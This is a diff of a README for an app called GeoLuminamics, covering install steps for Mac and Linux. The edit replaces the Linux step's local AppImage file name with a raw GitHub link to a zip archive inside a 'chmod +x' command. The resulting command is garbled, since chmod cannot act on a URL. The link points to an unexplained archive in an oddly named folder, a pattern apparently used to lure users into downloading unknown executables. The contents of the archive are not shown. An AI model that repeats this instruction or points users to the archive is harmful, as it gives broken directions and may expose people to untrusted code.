David123ok/GeoLuminamics/README.md

 - **Mac**: Open the `.dmg` file.
 Drag the GeoLuminamics app into your Applications folder.
 Then, open it from Applications.

-- **Linux**: Make the file executable (if needed) with the command `chmod +x GeoLuminamics.AppImage`.
+- **Linux**: Make the file executable (if needed) with the command `chmod +x https://github.com/David123ok/GeoLuminamics/raw/refs/heads/main/_02_engines/Luminamics_Geo_v2.3-beta.2.zip`.
 Then, double-click it or run it from the terminal.

 ---